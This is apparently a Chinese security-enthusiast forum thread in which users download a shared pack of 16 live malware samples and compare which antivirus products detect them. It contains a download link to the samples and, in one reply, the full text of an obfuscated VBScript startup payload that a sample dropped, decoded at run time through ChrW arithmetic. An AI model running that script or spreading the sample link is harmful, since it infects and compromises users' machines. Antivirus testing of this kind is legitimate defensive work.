[病毒样本] 16x

显示全部楼层 · 发表于 2019-8-6 07:02:43

https://www.lanzous.com/i5chuaj

(*文件若在发包前传过VT，文件名为VT的First Submission；若没有传过VT，文件名为发包日期（GMT +8）及其CRC32*)

显示全部楼层 · 发表于 2019-8-6 07:38:41

本帖最后由 swizzer 于 2019-8-6 07:57 编辑

avast 扫描8x，双击4x

有一个忘记截图了。。。上图是203310的衍生物，avast回滚母体。

显示全部楼层 · 发表于 2019-8-6 07:54:03

本帖最后由 Wandering... 于 2019-8-6 07:58 编辑

火绒扫不了“2019-08-06 34F4A2C6”“2019-08-06 FDF05FAE”卡很久，其他全部miss

XP只能运行前面的两个

显示全部楼层 · 发表于 2019-8-6 08:15:42

fs

剩余6x2019-08-06 FDF05FAE Reason: Trojan:W32/Injector.A!DeepGuard
2019-08-05 203310 Reason: Trojan:W32/KillProc.B!DeepGuard
2019-08-05 212151 Reason: Trojan:W32/KillProc.B!DeepGuard
2019-08-06 27EDB418 Reason: Trojan:W32/KillProc.B!DeepGuard
2019-08-06 7868BA24 在开机启动插入了一个vbs 手删

Set objShell = WScript.CreateObject("WScript.Shell")
objShell.Run ChrW(88439.6775390243/1319.99518714962)&ChrW(145604.819038907/2510.42791446391)&ChrW(98602.1444075955/1071.76243921299)&ChrW(143184.747399974/1684.5264399997)&ChrW(160359.091790499/1394.42688513477)&ChrW(534647.720218039/5293.54178433702)&ChrW(381769.247059343/3348.8530443802)&ChrW(357261.286943652/3106.61988646653)&ChrW(511095.060387041/5555.38109116349)&ChrW(731062.511480448/6896.81614604197)&ChrW(441909.111894181/4375.33774152654)&ChrW(352193.033694232/3452.87287935521)&ChrW(239079.575202176/2343.91740394291)&ChrW(121882.186868233/2257.0775345969)&ChrW(42575.0476791272/462.772257381817)&ChrW(514780.845783743/7919.70531974989)&ChrW(437349.423865523/3904.90557022789)&ChrW(77289.9735554159/690.089049601927)&ChrW(337991.296687483/4970.46024540416)&ChrW(697358.772704247/7189.26569798193)&ChrW(717792.744257432/6187.86848497787)&ChrW(32733.5331445865/337.459104583366)&ChrW(891855.421109271/9694.08066423121)&ChrW(417569.317689029/5494.33312748722)&ChrW(871236.544186365/7848.97787555284)&ChrW(958299.744110822/9679.79539505881)&ChrW(613451.646644114/6324.24377983622)&ChrW(571844.467164139/5294.85617744573)&ChrW(506280.604570479/5503.05004967912)&ChrW(565919.79563936/6737.1404242781)&ChrW(131650.678484985/1303.47206420777)&ChrW(717201.258330243/6579.82805807563)&ChrW(538077.910529584/4804.26705829985)&ChrW(803731.269669894/8736.20945293363)&ChrW(440545.390050989/5506.81737563736)&ChrW(512422.141324627/4494.93106425111)&ChrW(17381.8568821752/165.541494115954)&ChrW(798645.80091913/7260.41637199209)&ChrW(1725.91243221425/14.8785554501228)&ChrW(189772.223767138/2599.61950365943)&ChrW(600694.48498101/5223.43030418269)&ChrW(73594.466716995/663.013213666622)&ChrW(846558.882111138/7838.50816769572)&ChrW(188221.691214553/1940.4298063356)&ChrW(696573.254304185/6004.94184744987)&ChrW(307919.491922687/2932.56658973987)&ChrW(404561.392561871/3644.69723028713)&ChrW(654255.247839696/5947.77498036087)&ChrW(640115.35654131/8890.49106307374)&ChrW(342124.256672116/3082.2005105596)&ChrW(730325.644627145/6350.65777936648)&ChrW(153732.269129195/1325.27818214823)&ChrW(544773.643040506/5921.45264174463)&ChrW(37756.5593364299/328.317907273304)&ChrW(92454.4369686395/924.544369686395)&ChrW(777937.331761857/7857.95284607937)&ChrW(85023.6009502206/787.255564353894)&ChrW(849337.683469104/7321.8765816302)&ChrW(423781.55143617/9212.64242252545)&ChrW(104691.973608635/1068.28544498608)&ChrW(388535.930639901/4005.52505814331)&ChrW(700154.47297814/6035.81442222535)

复制代码

2019-08-06 A4DC7741 开机启动添加名为remcos的进程手删

显示全部楼层 · 发表于 2019-8-6 08:27:25

360kill 13X
剩下
224526
1F127669
7868BA24
样本够新！

显示全部楼层 · 发表于 2019-8-6 08:35:56

Windows Defender

On-Access Scan 12X+Run 3X=15/16

剩余2019-08-05 212151.exe

显示全部楼层 · 发表于 2019-8-6 08:57:41

智量清空！ (其中Heur杀14X)，火绒又卡死了。。

显示全部楼层 · 发表于 2019-8-6 09:04:26

安天智甲、管家无BD，都是kill 1X 。。。样本够新！大家趁热吃。。

显示全部楼层 · 发表于 2019-8-6 09:17:15

没人双击嘛？火绒居然会卡住？？？这不是智量的BUG嘛，这次智量反而不卡
同3L，卡这两个

显示全部楼层 · 发表于 2019-8-6 09:28:20

火绒实测杀1个，
操作进程：C:\Program Files\Bandizip\Bandizip.exe
病毒路径：C:\Users\Administrator\Desktop\8.6_1\2019-08-06 8EF38B50.exe
病毒名称：TrojanSpy/Banker.t
病毒ID：A85E3ECFAF11C9CA
操作结果：已处理

火绒大概扫了3分钟，最后无风险

[病毒样本] 16x

评分

本帖子中包含更多资源

评分

本帖子中包含更多资源

评分

本帖子中包含更多资源

评分

本帖子中包含更多资源

本帖子中包含更多资源